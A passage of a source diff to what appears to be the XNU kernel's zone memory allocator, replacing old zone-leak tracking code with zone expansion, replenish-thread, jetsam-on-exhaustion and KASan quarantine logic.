want to occupy the same spot */ -unsigned int z_alloc_collisions = 0; -unsigned int z_trace_collisions = 0; + if (z->z_expander == NULL) { + z->z_expander = self; + break; + } + if (clear_vm_priv) { + break; + } -/* Times a new record lands on a spot previously occupied by a freed allocation */ -unsigned int z_alloc_overwrites = 0; -unsigned int z_trace_overwrites = 0; + if (flags & Z_NOPAGEWAIT) { + return; + } -/* Times a new alloc or trace is put into the hash table */ -unsigned int z_alloc_recorded = 0; -unsigned int z_trace_recorded = 0; + z->z_expanding_wait = true; + lck_spin_sleep_with_inheritor(&z->z_lock, LCK_SLEEP_DEFAULT, + &z->z_expander, z->z_expander, + TH_UNINT, TIMEOUT_WAIT_FOREVER); + } -/* Times zleak_log returned false due to not being able to acquire the lock */ -unsigned int z_total_conflicts = 0; + do { + struct zone_page_metadata *meta = NULL; + uint32_t new_va = 0, cur_pages = 0, 
min_pages = 0, pages = 0; + vm_page_t page_list = NULL; + vm_offset_t addr = 0; + int waited = 0; -/* - * Structure for keeping track of an allocation - * An allocation bucket is in use if its element is not NULL - */ -struct zallocation { - uintptr_t za_element; /* the element that was zalloc'ed or zfree'ed, NULL if bucket unused */ - vm_size_t za_size; /* how much memory did this allocation take up? */ - uint32_t za_trace_index; /* index into ztraces for backtrace associated with allocation */ - /* TODO: #if this out */ - uint32_t za_hit_count; /* for determining effectiveness of hash function */ -}; + /* + * While we hold the zone lock, look if there's VA we can: + * - complete from partial pages, + * - reuse from the sequester list. + * + * When the page is being populated we pretend we allocated + * an extra element so that zone_gc() can't attempt to free + * the chunk (as it could become empty while we wait for pages). + */ + if (!zone_pva_is_null(z->z_pageq_va)) { + meta = zone_meta_queue_pop_native(z, + &z->z_pageq_va, &addr); + if (meta->zm_chunk_len == ZM_SECONDARY_PAGE) { + cur_pages = meta->zm_page_index; + meta -= cur_pages; + addr -= ptoa(cur_pages); + zone_meta_lock_in_partial(z, meta, cur_pages); + } + } + zone_unlock(z); -/* Size must be a power of two for the zhash to be able to just mask off bits instead of mod */ -uint32_t zleak_alloc_buckets = CONFIG_ZLEAK_ALLOCATION_MAP_NUM; -uint32_t zleak_trace_buckets = CONFIG_ZLEAK_TRACE_MAP_NUM; + /* + * Do the zone leak activation here because zleak_activate() + * may block, and can't be done on the way out. + * + * Trigger jetsams via the vm_pageout_garbage_collect thread if + * we're running out of zone memory + */ + zleak_activate_if_needed(); + if (zone_map_nearing_exhaustion()) { + thread_wakeup((event_t)&vm_pageout_garbage_collect); + } -vm_size_t zleak_max_zonemap_size; + /* + * And now allocate pages to populate our VA. 
+ */ + if (z->z_percpu) { + min_pages = z->z_chunk_pages; + } else { + min_pages = (uint32_t)atop(round_page(zone_elem_size(z))); + } -/* Hashmaps of allocations and their corresponding traces */ -static struct zallocation* zallocations; -static struct ztrace* ztraces; + ZONE_TRACE_VM_KERN_REQUEST_START(ptoa(z->z_chunk_pages - cur_pages)); -/* not static so that panic can see this, see kern/debug.c */ -struct ztrace* top_ztrace; + while (pages < z->z_chunk_pages - cur_pages) { + vm_page_t m = vm_page_grab(); -/* Lock to protect zallocations, ztraces, and top_ztrace from concurrent modification. */ -LCK_GRP_DECLARE(zleak_lock_grp, "zleak_lock"); -LCK_SPIN_DECLARE(zleak_lock, &zleak_lock_grp); + if (m) { + pages++; + m->vmp_snext = page_list; + page_list = m; + vm_page_zero_fill(m); + continue; + } -/* - * Initializes the zone leak monitor. Called from zone_init() - */ -__startup_func -static void -zleak_init(vm_size_t max_zonemap_size) -{ - char scratch_buf[16]; - boolean_t zleak_enable_flag = FALSE; + if (pages >= min_pages && (vm_pool_low() || waited)) { + break; + } - zleak_max_zonemap_size = max_zonemap_size; - zleak_global_tracking_threshold = max_zonemap_size / 2; - zleak_per_zone_tracking_threshold = zleak_global_tracking_threshold / 8; + if ((flags & Z_NOPAGEWAIT) == 0) { + waited++; + VM_PAGE_WAIT(); + continue; + } -#if CONFIG_EMBEDDED - if (PE_parse_boot_argn("-zleakon", scratch_buf, sizeof(scratch_buf))) { - zleak_enable_flag = TRUE; - printf("zone leak detection enabled\n"); - } else { - zleak_enable_flag = FALSE; - printf("zone leak detection disabled\n"); - } -#else /* CONFIG_EMBEDDED */ - /* -zleakoff (flag to disable zone leak monitor) */ - if (PE_parse_boot_argn("-zleakoff", scratch_buf, sizeof(scratch_buf))) { - zleak_enable_flag = FALSE; - printf("zone leak detection disabled\n"); - } else { - zleak_enable_flag = TRUE; - printf("zone leak detection enabled\n"); - } -#endif /* CONFIG_EMBEDDED */ + /* + * Undo everything and bail out: + * + * - 
free pages + * - undo the fake allocation if any + * - put the VA back on the VA page queue. + */ + vm_page_free_list(page_list, FALSE); + ZONE_TRACE_VM_KERN_REQUEST_END(pages); - /* zfactor=XXXX (override how often to sample the zone allocator) */ - if (PE_parse_boot_argn("zfactor", &zleak_sample_factor, sizeof(zleak_sample_factor))) { - printf("Zone leak factor override: %u\n", zleak_sample_factor); - } + zone_lock(z); - /* zleak-allocs=XXXX (override number of buckets in zallocations) */ - if (PE_parse_boot_argn("zleak-allocs", &zleak_alloc_buckets, sizeof(zleak_alloc_buckets))) { - printf("Zone leak alloc buckets override: %u\n", zleak_alloc_buckets); - /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */ - if (zleak_alloc_buckets == 0 || (zleak_alloc_buckets & (zleak_alloc_buckets - 1))) { - printf("Override isn't a power of two, bad things might happen!\n"); + if (cur_pages) { + zone_meta_unlock_from_partial(z, meta, cur_pages); + } + if (meta) { + zone_meta_queue_push(z, &z->z_pageq_va, + meta + cur_pages); + } + goto page_shortage; } - } - /* zleak-traces=XXXX (override number of buckets in ztraces) */ - if (PE_parse_boot_argn("zleak-traces", &zleak_trace_buckets, sizeof(zleak_trace_buckets))) { - printf("Zone leak trace buckets override: %u\n", zleak_trace_buckets); - /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */ - if (zleak_trace_buckets == 0 || (zleak_trace_buckets & (zleak_trace_buckets - 1))) { - printf("Override isn't a power of two, bad things might happen!\n"); + /* + * If we didn't find pre-allocated VA, then allocate a chunk + * of VA here. 
+ */ + if (addr == 0) { + addr = zone_allocate_va(z, flags); + meta = zone_meta_from_addr(addr); + new_va = z->z_chunk_pages; } - } - if (zleak_enable_flag) { - zleak_state = ZLEAK_STATE_ENABLED; - } -} + kernel_memory_populate_with_pages(zone_submap(z), + addr + ptoa(cur_pages), ptoa(pages), page_list, + zone_kma_flags(z, flags), VM_KERN_MEMORY_ZONE); -/* - * Support for kern.zleak.active sysctl - a simplified - * version of the zleak_state variable. - */ -int -get_zleak_state(void) -{ - if (zleak_state & ZLEAK_STATE_FAILED) { - return -1; + ZONE_TRACE_VM_KERN_REQUEST_END(pages); + + zcram_and_lock(z, addr, new_va, cur_pages, cur_pages + pages, + ZONE_ADDR_NATIVE); + } while (pred(z)); + +page_shortage: + zleak_track_if_needed(z); + + if (clear_vm_priv) { + z->z_expander_vm_priv = false; + clear_thread_rwlock_boost(); } - if (zleak_state & ZLEAK_STATE_ACTIVE) { - return 1; + if (z->z_expander == self) { + z->z_expander = THREAD_NULL; + } + if (z->z_expanding_wait) { + z->z_expanding_wait = false; + wakeup_all_with_inheritor(&z->z_expander, THREAD_AWAKENED); } - return 0; } -kern_return_t -zleak_activate(void) +static bool +zalloc_needs_refill(zone_t zone) { - kern_return_t retval; - vm_size_t z_alloc_size = zleak_alloc_buckets * sizeof(struct zallocation); - vm_size_t z_trace_size = zleak_trace_buckets * sizeof(struct ztrace); - void *allocations_ptr = NULL; - void *traces_ptr = NULL; - - /* Only one thread attempts to activate at a time */ - if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) { - return KERN_SUCCESS; + if (zone->z_elems_free > zone->z_elems_rsv) { + return false; } - - /* Indicate that we're doing the setup */ - lck_spin_lock(&zleak_lock); - if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) { - lck_spin_unlock(&zleak_lock); - return KERN_SUCCESS; + if (zone->z_wired_cur < zone->z_wired_max) { + return true; } - - zleak_state |= ZLEAK_STATE_ACTIVATING; - 
lck_spin_unlock(&zleak_lock); - - /* Allocate and zero tables */ - retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&allocations_ptr, z_alloc_size, VM_KERN_MEMORY_OSFMK); - if (retval != KERN_SUCCESS) { - goto fail; + if (zone->exhaustible) { + return false; } - - retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&traces_ptr, z_trace_size, VM_KERN_MEMORY_OSFMK); - if (retval != KERN_SUCCESS) { - goto fail; + if (zone->expandable) { + /* + * If we're expandable, just don't go through this again. + */ + zone->z_wired_max = ~0u; + return true; } + zone_unlock(zone); - bzero(allocations_ptr, z_alloc_size); - bzero(traces_ptr, z_trace_size); - - /* Everything's set. Install tables, mark active. */ - zallocations = allocations_ptr; - ztraces = traces_ptr; - - /* - * Initialize the top_ztrace to the first entry in ztraces, - * so we don't have to check for null in zleak_log - */ - top_ztrace = &ztraces[0]; + panic_include_zprint = true; +#if CONFIG_ZLEAKS + if (zleak_state & ZLEAK_STATE_ACTIVE) { + panic_include_ztrace = true; + } +#endif /* CONFIG_ZLEAKS */ + panic("zone '%s%s' exhausted", zone_heap_name(zone), zone_name(zone)); +} - /* - * Note that we do need a barrier between installing - * the tables and setting the active flag, because the zfree() - * path accesses the table without a lock if we're active. - */ - lck_spin_lock(&zleak_lock); - zleak_state |= ZLEAK_STATE_ACTIVE; - zleak_state &= ~ZLEAK_STATE_ACTIVATING; - lck_spin_unlock(&zleak_lock); +static void +zone_expand_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1) +{ + zone_foreach(z) { + if (z->no_callout) { + /* z_async_refilling will never be set */ + continue; + } - return 0; + if (z->z_replenishes) { + /* those use the zone_replenish_thread */ + continue; + } -fail: - /* - * If we fail to allocate memory, don't further tax - * the system by trying again. 
- */ - lck_spin_lock(&zleak_lock); - zleak_state |= ZLEAK_STATE_FAILED; - zleak_state &= ~ZLEAK_STATE_ACTIVATING; - lck_spin_unlock(&zleak_lock); + zone_lock(z); + if (z->z_self && z->z_async_refilling) { + z->z_async_refilling = false; + zone_expand_locked(z, Z_WAITOK, zalloc_needs_refill); + } + zone_unlock(z); + } +} - if (allocations_ptr != NULL) { - kmem_free(kernel_map, (vm_offset_t)allocations_ptr, z_alloc_size); +static inline void +zone_expand_async_schedule_if_needed(zone_t zone) +{ + if (zone->z_elems_free > zone->z_elems_rsv || zone->z_async_refilling || + zone->no_callout) { + return; } - if (traces_ptr != NULL) { - kmem_free(kernel_map, (vm_offset_t)traces_ptr, z_trace_size); + if (!zone->expandable && zone->z_wired_cur >= zone->z_wired_max) { + return; } - return retval; + if (zone->z_elems_free == 0 || !vm_pool_low()) { + zone->z_async_refilling = true; + thread_call_enter(&zone_expand_callout); + } } -/* - * TODO: What about allocations that never get deallocated, - * especially ones with unique backtraces? Should we wait to record - * until after boot has completed? - * (How many persistent zallocs are there?) - */ +#endif /* !ZALLOC_TEST */ +#pragma mark zone replenishing (VM allocations) +#if !ZALLOC_TEST /* - * This function records the allocation in the allocations table, - * and stores the associated backtrace in the traces table - * (or just increments the refcount if the trace is already recorded) - * If the allocation slot is in use, the old allocation is replaced with the new allocation, and - * the associated trace's refcount is decremented. - * If the trace slot is in use, it returns. - * The refcount is incremented by the amount of memory the allocation consumes. - * The return value indicates whether to try again next time. + * Tracks how many zone_replenish threads are active, because zone_gc() wants + * for those to be finished before it proceeds. 
+ * + * This counts how many replenish threads are active in + * ZONE_REPLENISH_ACTIVE_INC increments, + * and uses the low bit to track if there are any waiters. */ -static boolean_t -zleak_log(uintptr_t* bt, - uintptr_t addr, - uint32_t depth, - vm_size_t allocation_size) +#define ZONE_REPLENISH_ACTIVE_NONE 0u +#define ZONE_REPLENISH_ACTIVE_WAITER_BIT 1u +#define ZONE_REPLENISH_ACTIVE_INC 2u +#define ZONE_REPLENISH_ACTIVE_MASK (~ZONE_REPLENISH_ACTIVE_WAITER_BIT) +static unsigned _Atomic zone_replenish_active; +static unsigned zone_replenish_wakeups; +static unsigned zone_replenish_wakeups_initiated; +static unsigned zone_replenish_throttle_count; + +#define ZONE_REPLENISH_TARGET (16 * 1024) + +static void +zone_replenish_wait_if_needed(void) { - /* Quit if there's someone else modifying the hash tables */ - if (!lck_spin_try_lock(&zleak_lock)) { - z_total_conflicts++; - return FALSE; + /* + * This check can be racy, the reserves ought to be enough + * to compensate for a little race + */ + while (os_atomic_load(&zone_replenish_active, relaxed) != + ZONE_REPLENISH_ACTIVE_NONE) { + unsigned o_active, n_active; + + assert_wait(&zone_replenish_active, THREAD_UNINT); + + os_atomic_rmw_loop(&zone_replenish_active, o_active, n_active, relaxed, { + if (o_active == ZONE_REPLENISH_ACTIVE_NONE) { + os_atomic_rmw_loop_give_up({ + clear_wait(current_thread(), THREAD_AWAKENED); + return; + }); + } + if (o_active & ZONE_REPLENISH_ACTIVE_WAITER_BIT) { + os_atomic_rmw_loop_give_up(break); + } + n_active = o_active | ZONE_REPLENISH_ACTIVE_WAITER_BIT; + }); + thread_block(THREAD_CONTINUE_NULL); } +} - struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)]; - - uint32_t trace_index = hashbacktrace(bt, depth, zleak_trace_buckets); - struct ztrace* trace = &ztraces[trace_index]; +__attribute__((noinline)) +static void +zone_replenish_locked(zone_t zone) +{ + thread_t thr = current_thread(); + uint32_t min_free; - allocation->za_hit_count++; - 
trace->zt_hit_count++; + zone_replenish_wakeups++; /* - * If the allocation bucket we want to be in is occupied, and if the occupier - * has the same trace as us, just bail. + * We'll let threads continue to allocate under the reserve: + * - until it is depleted to 50% for regular threads, + * - until it is depleted to 25% for VM_PRIV threads. + * + * After that only TH_OPT_ZONE_PRIV threads may continue. */ - if (allocation->za_element != (uintptr_t) 0 && trace_index == allocation->za_trace_index) { - z_alloc_collisions++; - - lck_spin_unlock(&zleak_lock); - return TRUE; + if (thr->options & TH_OPT_VMPRIV) { + min_free = zone->z_elems_rsv / 4; + } else { + min_free = zone->z_elems_rsv / 2; } - /* STEP 1: Store the backtrace in the traces array. */ - /* A size of zero indicates that the trace bucket is free. */ - - if (trace->zt_size > 0 && bcmp(trace->zt_stack, bt, (depth * sizeof(uintptr_t))) != 0) { + while (zone->z_elems_free <= zone->z_elems_rsv) { /* - * Different unique trace with same hash! - * Just bail - if we're trying to record the leaker, hopefully the other trace will be deallocated - * and get out of the way for later chances + * Wakeup the replenish thread if not running. */ - trace->zt_collisions++; - z_trace_collisions++; - - lck_spin_unlock(&zleak_lock); - return TRUE; - } else if (trace->zt_size > 0) { - /* Same trace, already added, so increment refcount */ - trace->zt_size += allocation_size; - } else { - /* Found an unused trace bucket, record the trace here! 
*/ - if (trace->zt_depth != 0) { /* if this slot was previously used but not currently in use */ - z_trace_overwrites++; + if (!zone->z_async_refilling) { + os_atomic_add(&zone_replenish_active, + ZONE_REPLENISH_ACTIVE_INC, relaxed); + zone->z_async_refilling = true; + zone_replenish_wakeups_initiated++; + thread_wakeup(&zone->z_elems_rsv); } - z_trace_recorded++; - trace->zt_size = allocation_size; - memcpy(trace->zt_stack, bt, (depth * sizeof(uintptr_t))); - - trace->zt_depth = depth; - trace->zt_collisions = 0; - } - - /* STEP 2: Store the allocation record in the allocations array. */ + if (zone->z_elems_free > min_free) { + break; + } - if (allocation->za_element != (uintptr_t) 0) { /* - * Straight up replace any allocation record that was there. We don't want to do the work - * to preserve the allocation entries that were there, because we only record a subset of the - * allocations anyways. + * TH_OPT_ZONE_PRIV threads are the GC thread and a replenish + * thread itself. + * + * Replenish threads *need* to use the reserve. GC threads need + * to get through the current allocation, but then will wait at + * a higher level after they've dropped any locks which would + * deadlock the replenish thread. + * + * The value of (refill_level / 2) in the previous bit of code + * should have given us headroom even though this thread didn't + * wait. 
*/ + if (thr->options & TH_OPT_ZONE_PRIV) { + assert(zone->z_elems_free != 0); + break; + } - z_alloc_collisions++; - - struct ztrace* associated_trace = &ztraces[allocation->za_trace_index]; - /* Knock off old allocation's size, not the new allocation */ - associated_trace->zt_size -= allocation->za_size; - } else if (allocation->za_trace_index != 0) { - /* Slot previously used but not currently in use */ - z_alloc_overwrites++; - } - - allocation->za_element = addr; - allocation->za_trace_index = trace_index; - allocation->za_size = allocation_size; + if (startup_phase < STARTUP_SUB_MACH_IPC) { + panic("vm_map_steal_memory didn't steal enough memory: " + "trying to grow [%s%s] before the scheduler has started", + zone_heap_name(zone), zone_name(zone)); + } - z_alloc_recorded++; + /* + * Wait for the replenish threads to add more elements + * for us to allocate from. + */ + zone_replenish_throttle_count++; + zone->z_replenish_wait = true; + assert_wait_timeout(zone, THREAD_UNINT, 1, NSEC_PER_MSEC); + zone_unlock(zone); + thread_block(THREAD_CONTINUE_NULL); + zone_lock(zone); + zone->z_replenish_wait = false; - if (top_ztrace->zt_size < trace->zt_size) { - top_ztrace = trace; + assert(zone->z_self == zone); } +} - lck_spin_unlock(&zleak_lock); - return TRUE; +static bool +zone_replenish_needed(zone_t z) +{ + return z->z_elems_free <= z->z_elems_rsv; } /* - * Free the allocation record and release the stacktrace. - * This should be as fast as possible because it will be called for every free. + * High priority VM privileged thread used to asynchronously refill a given zone. + * These are needed for data structures used by the lower level VM itself. The + * replenish thread maintains a reserve of elements, so that the VM will never + * block in the zone allocator. 
*/ -__attribute__((noinline)) +__dead2 static void -zleak_free(uintptr_t addr, - vm_size_t allocation_size) +zone_replenish_thread(void *_z, wait_result_t __unused wr) { - if (addr == (uintptr_t) 0) { - return; + unsigned o_active, n_active; + zone_t z = _z; + + zone_lock(z); + assert(z->z_self == z); + assert(z->z_async_refilling && z->z_replenishes); + + zone_expand_locked(z, Z_WAITOK, zone_replenish_needed); + + if (z->z_replenish_wait) { + /* Wakeup any potentially throttled allocations */ + z->z_replenish_wait = false; + thread_wakeup(z); } - struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)]; + /* wakeup zone_reclaim() callers that were possibly waiting */ + os_atomic_rmw_loop(&zone_replenish_active, o_active, n_active, relaxed, { + if (os_sub_overflow(o_active, ZONE_REPLENISH_ACTIVE_INC, &n_active)) { + panic("zone_replenish_active corrupt: %d", o_active); + } + if ((n_active & ZONE_REPLENISH_ACTIVE_MASK) == 0) { + n_active = ZONE_REPLENISH_ACTIVE_NONE; + } + }); - /* Double-checked locking: check to find out if we're interested, lock, check to make - * sure it hasn't changed, then modify it, and release the lock. - */ + if (n_active == ZONE_REPLENISH_ACTIVE_NONE && + (o_active & ZONE_REPLENISH_ACTIVE_WAITER_BIT)) { + thread_wakeup(&zone_replenish_active); + } - if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) { - /* if the allocation was the one, grab the lock, check again, then delete it */ - lck_spin_lock(&zleak_lock); + z->z_async_refilling = false; + assert_wait(&z->z_elems_rsv, THREAD_UNINT); - if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) { - struct ztrace *trace; + zone_unlock(z); - /* allocation_size had better match what was passed into zleak_log - otherwise someone is freeing into the wrong zone! 
*/ - if (allocation->za_size != allocation_size) { - panic("Freeing as size %lu memory that was allocated with size %lu\n", - (uintptr_t)allocation_size, (uintptr_t)allocation->za_size); - } + thread_block_parameter(zone_replenish_thread, z); + __builtin_unreachable(); +} - trace = &ztraces[allocation->za_trace_index]; +void +zone_replenish_configure(zone_t z) +{ + thread_t th; + kern_return_t kr; + char name[MAXTHREADNAMESIZE]; - /* size of 0 indicates trace bucket is unused */ - if (trace->zt_size > 0) { - trace->zt_size -= allocation_size; - } + zone_lock(z); + assert(!z->z_replenishes && !z->z_destructible); + z->z_elems_rsv = (uint16_t)(ZONE_REPLENISH_TARGET / zone_elem_size(z)); + z->z_replenishes = true; + os_atomic_add(&zone_replenish_active, ZONE_REPLENISH_ACTIVE_INC, relaxed); + z->z_async_refilling = true; + zone_unlock(z); - /* A NULL element means the allocation bucket is unused */ - allocation->za_element = 0; - } - lck_spin_unlock(&zleak_lock); + kr = kernel_thread_create(zone_replenish_thread, z, MAXPRI_KERNEL, &th); + if (kr != KERN_SUCCESS) { + panic("zone_replenish_configure, thread create: 0x%x", kr); } + /* make sure this thread can't lose its stack */ + assert(th->reserved_stack == th->kernel_stack); + + snprintf(name, sizeof(name), "z_replenish(%s)", zone_name(z)); + thread_set_thread_name(th, name); + + thread_mtx_lock(th); + th->options |= TH_OPT_VMPRIV | TH_OPT_ZONE_PRIV; + thread_start(th); + thread_mtx_unlock(th); + + thread_deallocate(th); } -#endif /* CONFIG_ZLEAKS */ +/*! @} */ +#endif /* !ZALLOC_TEST */ +#pragma mark zone jetsam integration +#if !ZALLOC_TEST -/* These functions outside of CONFIG_ZLEAKS because they are also used in - * mbuf.c for mbuf leak-detection. This is why they lack the z_ prefix. +/* + * We're being very conservative here and picking a value of 95%. We might need to lower this if + * we find that we're not catching the problem and are still hitting zone map exhaustion panics. 
*/ +#define ZONE_MAP_JETSAM_LIMIT_DEFAULT 95 -/* "Thomas Wang's 32/64 bit mix functions." http://www.concentric.net/~Ttwang/tech/inthash.htm */ -uintptr_t -hash_mix(uintptr_t x) +/* + * Trigger zone-map-exhaustion jetsams if the zone map is X% full, where X=zone_map_jetsam_limit. + * Can be set via boot-arg "zone_map_jetsam_limit". Set to 95% by default. + */ +TUNABLE_WRITEABLE(unsigned int, zone_map_jetsam_limit, "zone_map_jetsam_limit", + ZONE_MAP_JETSAM_LIMIT_DEFAULT); + +void +get_zone_map_size(uint64_t *current_size, uint64_t *capacity) { -#ifndef __LP64__ - x += ~(x << 15); - x ^= (x >> 10); - x += (x << 3); - x ^= (x >> 6); - x += ~(x << 11); - x ^= (x >> 16); -#else - x += ~(x << 32); - x ^= (x >> 22); - x += ~(x << 13); - x ^= (x >> 8); - x += (x << 3); - x ^= (x >> 15); - x += ~(x << 27); - x ^= (x >> 31); -#endif - return x; + vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); + *current_size = ptoa_64(phys_pages); + *capacity = ptoa_64(zone_phys_mapped_max_pages); } -uint32_t -hashbacktrace(uintptr_t* bt, uint32_t depth, uint32_t max_size) +void +get_largest_zone_info(char *zone_name, size_t zone_name_len, uint64_t *zone_size) { - uintptr_t hash = 0; - uintptr_t mask = max_size - 1; + zone_t largest_zone = zone_find_largest(); - while (depth) { - hash += bt[--depth]; + /* + * Append kalloc heap name to zone name (if zone is used by kalloc) + */ + snprintf(zone_name, zone_name_len, "%s%s", + zone_heap_name(largest_zone), largest_zone->z_name); + + *zone_size = zone_size_wired(largest_zone); +} + +bool +zone_map_nearing_exhaustion(void) +{ + uint64_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); + return phys_pages * 100 > zone_phys_mapped_max_pages * zone_map_jetsam_limit; +} + + +#define VMENTRY_TO_VMOBJECT_COMPARISON_RATIO 98 + +/* + * Tries to kill a single process if it can attribute one to the largest zone. 
If not, wakes up the memorystatus thread + * to walk through the jetsam priority bands and kill processes. + */ +static void +kill_process_in_largest_zone(void) +{ + pid_t pid = -1; + zone_t largest_zone = zone_find_largest(); + + printf("zone_map_exhaustion: Zone mapped %lld of %lld, used %lld, capacity %lld [jetsam limit %d%%]\n", + ptoa_64(os_atomic_load(&zones_phys_page_mapped_count, relaxed)), + ptoa_64(zone_phys_mapped_max_pages), + (uint64_t)zone_submaps_approx_size(), + (uint64_t)(zone_foreign_size() + zone_native_size()), + zone_map_jetsam_limit); + printf("zone_map_exhaustion: Largest zone %s%s, size %lu\n", zone_heap_name(largest_zone), + largest_zone->z_name, (uintptr_t)zone_size_wired(largest_zone)); + + /* + * We want to make sure we don't call this function from userspace. + * Or we could end up trying to synchronously kill the process + * whose context we're in, causing the system to hang. + */ + assert(current_task() == kernel_task); + + /* + * If vm_object_zone is the largest, check to see if the number of + * elements in vm_map_entry_zone is comparable. + * + * If so, consider vm_map_entry_zone as the largest. This lets us target + * a specific process to jetsam to quickly recover from the zone map + * bloat. + */ + if (largest_zone == vm_object_zone) { + unsigned int vm_object_zone_count = zone_count_allocated(vm_object_zone); + unsigned int vm_map_entry_zone_count = zone_count_allocated(vm_map_entry_zone); + /* Is the VM map entries zone count >= 98% of the VM objects zone count? */ + if (vm_map_entry_zone_count >= ((vm_object_zone_count * VMENTRY_TO_VMOBJECT_COMPARISON_RATIO) / 100)) { + largest_zone = vm_map_entry_zone; + printf("zone_map_exhaustion: Picking VM map entries as the zone to target, size %lu\n", + (uintptr_t)zone_size_wired(largest_zone)); + } + } + + /* TODO: Extend this to check for the largest process in other zones as well. 
*/ + if (largest_zone == vm_map_entry_zone) { + pid = find_largest_process_vm_map_entries(); + } else { + printf("zone_map_exhaustion: Nothing to do for the largest zone [%s%s]. " + "Waking up memorystatus thread.\n", zone_heap_name(largest_zone), + largest_zone->z_name); } + if (!memorystatus_kill_on_zone_map_exhaustion(pid)) { + printf("zone_map_exhaustion: Call to memorystatus failed, victim pid: %d\n", pid); + } +} - hash = hash_mix(hash) & mask; - - assert(hash < max_size); +#endif /* !ZALLOC_TEST */ +#pragma mark zfree +#if !ZALLOC_TEST +#if KASAN_ZALLOC - return (uint32_t) hash; -} +/*! + * @defgroup zfree + * @{ + * + * @brief + * The codepath for zone frees. + * + * @discussion + * There are 4 major ways to allocate memory that end up in the zone allocator: + * - @c zfree() + * - @c zfree_percpu() + * - @c kfree*() + * - @c zfree_permanent() + * + * While permanent zones have their own allocation scheme, all other codepaths + * will eventually go through the @c zfree_ext() choking point. + * + * Ignoring the @c gzalloc_free() codepath, the decision tree looks like this: + * + * zfree_ext() + * ├───> zfree_cached() ────────────────╮ + * │ │ │ + * │ │ │ + * │ ├───> zfree_cached_slow() ───┤ + * │ │ │ │ + * │ │ v │ + * ╰───────┴───> zfree_item() ──────────┴───> + * + * + * @c zfree_ext() takes care of all the generic work to perform on an element + * before it is freed (zeroing, logging, tagging, ...) then will hand it off to: + * - @c zfree_item() if zone caching is off + * - @c zfree_cached() if zone caching is on. + * + * @c zfree_cached can take a number of decisions: + * - a fast path if the (f) or (a) magazines have space (preemption disabled), + * - using the cpu local or recirculation depot calling @c zfree_cached_slow(), + * - falling back to @c zfree_item() when CPU caching has been disabled. + */ /* - * TODO: Determine how well distributed this is - * max_size must be a power of 2. 
i.e 0x10000 because 0x10000-1 is 0x0FFFF which is a great bitmask + * Called from zfree() to add the element being freed to the KASan quarantine. + * + * Returns true if the newly-freed element made it into the quarantine without + * displacing another, false otherwise. In the latter case, addrp points to the + * address of the displaced element, which will be freed by the zone. */ -uint32_t -hashaddr(uintptr_t pt, uint32_t max_size) +static bool +kasan_quarantine_freed_element( + zone_t *zonep, /* the zone the element is being freed to */ + void **addrp) /* address of the element being freed */ { - uintptr_t hash = 0; - uintptr_t mask = max_size - 1; - - hash = hash_mix(pt) & mask; + zone_t zone = *zonep; + void *addr = *addrp; - assert(hash < max_size); + /* + * Resize back to the real allocation size and hand off to the KASan + * quarantine. `addr` may then point to a different allocation, if the + * current element replaced another in the quarantine. The zone then + * takes ownership of the swapped out free element. 
+ */ + vm_size_t usersz = zone_elem_size(zone) - 2 * zone->z_kasan_redzone; + vm_size_t sz = usersz; - return (uint32_t) hash; + if (addr && zone->z_kasan_redzone) { + kasan_check_free((vm_address_t)addr, usersz, KASAN_HEAP_ZALLOC); + addr = (void *)kasan_dealloc((vm_address_t)addr, &sz); + assert(sz == zone_elem_size(zone)); + } + if (addr && !zone->kasan_noquarantine) { + kasan_free(&addr, &sz, KASAN_HEAP_ZALLOC, zonep, usersz, true); + if (!addr) { + return TRUE; + } + } + if (addr && zone->kasan_noquarantine) { + kasan_unpoison(addr, zone_elem_size(zone)); + } + *addrp = addr; + return FALSE; } -/* End of all leak-detection code */ -#pragma mark zone creation, configuration, destruction +#endif /* KASAN_ZALLOC */ -static zone_t -zone_init_defaults(zone_id_t zid) +__header_always_inline void +zfree_drop(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze, + bool recirc) { - zone_t z = &zone_array[zid]; - - z->page_count_max = ~0u; - z->collectable = true; - z->expandable = true; - z->submap_idx = Z_SUBMAP_IDX_GENERAL_MAP; + vm_offset_t esize = zone_elem_size(zone); - simple_lock_init(&z->lock, 0); + if (zone_meta_mark_free(meta, ze) == recirc) { + zone_meta_double_free_panic(zone, ze, __func__); + } - return z; -} + vm_offset_t old_size = meta->zm_alloc_size; + vm_offset_t max_size = ptoa(meta->zm_chunk_len) + ZM_ALLOC_SIZE_LOCK; + vm_offset_t new_size = zone_meta_alloc_size_sub(zone, meta, esize); -static bool -zone_is_initializing(zone_t z) -{ - return !z->z_self && !z->destroyed; + if (new_size == 0) { + /* whether the page was on the intermediate or all_used, queue, move it to free */ + zone_meta_requeue(zone, &zone->z_pageq_empty, meta); + zone->z_wired_empty += meta->zm_chunk_len; + } else if (old_size + esize > max_size) { + /* first free element on page, move from all_used */ + zone_meta_requeue(zone, &zone->z_pageq_partial, meta); + } } static void -zone_set_max(zone_t z, vm_size_t max) +zfree_item(zone_t zone, struct zone_page_metadata 
